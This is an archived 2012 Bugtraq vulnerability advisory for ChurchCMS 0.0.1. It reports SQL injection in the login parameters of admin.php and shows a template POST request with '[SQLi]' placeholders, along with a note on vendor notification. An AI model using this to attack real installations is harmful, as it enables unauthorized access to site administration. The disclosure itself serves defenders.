lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAJE=EcY7rPfUUL4rdwRPUEByTAk7aG4xCQju1oJhp4KdZ3qS1Q@mail.gmail.com>
Date: Mon, 23 Apr 2012 13:11:33 -0400
From: Thomas Richards <g13net@...il.com>
To: bugtraq@...urityfocus.com
Subject: ChurchCMS 0.0.1 'admin.php' Multiple SQLi

# Exploit Title: ChurchCMS 0.0.1 'admin.php' Multiple SQLi
# Date: 04/21/12
# Author: G13
# Twitter: @g13net
# Software Link: http://sourceforge.net/projects/churchcms/?source=directory
# Version: 0.0.1
# Category: webapps (php)
#

##### Description #####

ChurchCMS is the software to place on your church's website that is
easily managed, self-intuitive, yet expandable via our module library.
Included features are: announcements, calendar, prayer requests
manager, and help wanted manager.

##### Vulnerability #####

The admin.php page has multiple SQL injection vulnerabilities.  Both
the 'uname' and 'pass'  parameters are vulnerable to SQL Injection.

The vulnerability exists via the POST method.

##### Exploit #####

POST http://localhost/churchcms/admin.php?op=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0)
Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Proxy-Connection: keep-alive
Referer: http://localhost/churchcms/index.php
Cookie: PHPSESSID=eq342ldrgqt4i5fshe6q2kvj17
Content-Type: application/x-www-form-urlencoded
Content-length: 40
uname=[SQLi]&pass=[SQLi]

##### Vendor Notification #####

04/21/12 - Vendor notified

Per my disclosure policy, advisory is released.

http://www.g13net.com/vuln-disc.txt

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ